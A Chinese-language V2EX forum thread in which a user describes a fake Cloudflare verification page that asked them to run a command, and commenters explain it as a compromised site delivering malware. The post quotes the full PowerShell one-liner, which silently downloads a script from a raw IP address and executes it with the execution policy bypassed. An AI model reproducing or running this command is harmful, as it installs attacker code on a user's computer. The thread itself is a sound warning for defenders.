V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
liyafe1997
V2EX  ›  Cloudflare

碰到了伪装 Cloudflare 钓鱼验证,差点中招

  •  
  •   liyafe1997 · 1 天前 · 444 次点击

    让我执行的命令

    powershell -w h -c "$u='http://83.217.209.227/2UP.lim';$p=\"$env:USERPROFILE\Music\d.ps1\";(New-Object System.Net.WebClient).DownloadFile($u,$p);powershell -w h -ep bypass -f $p"
    

    我还想着 CF 什么时候这么狠了,居然让用户执行 Shell 验证(第一反应以为是想让用户通过 Shell 往服务器上 POST 一些东西来证明不是 robot ),看到这里面的 URL 居然直接用 IP 地址而且没有 https ,还好多了个心眼。

    想看看这脚本到底是啥,直接打开上面那个 URL 被卡巴斯基拦截了。

    不过现在好像已经 404 了,不知道是不是会判断 UA 啥的,用浏览器打开就 404 。

    关键是,这理应是个正规站(所以一开始我心理没设防),难道是被黑了?

    leoking6
        1
    leoking6  
       1 天前
    这大概率就是 WordPress 被攻破了,让人家挂上恶意插件了。至于脚本 404 了,那个地址就是个老毛子的 VPS 服务商的 IP ,打一枪换个地方咯。
    silverwzw
        2
    silverwzw  
       1 天前
    遇到这种事情就想想 CF 可能让普通用户这么做吗?
    UnluckyNinja
        3
    UnluckyNinja  
       1 天前
    web 之所以是 web ,就在于有浏览器这个沙盒屏障,在并非由用户方首先提出的情况下(下载文件、查找参考等),单方面想跳出浏览器环境的,一眼黑产
    关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   Solana   ·   5201 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 35ms · UTC 05:53 · PVG 13:53 · LAX 21:53 · JFK 00:53
    ♥ Do have faith in what you're doing.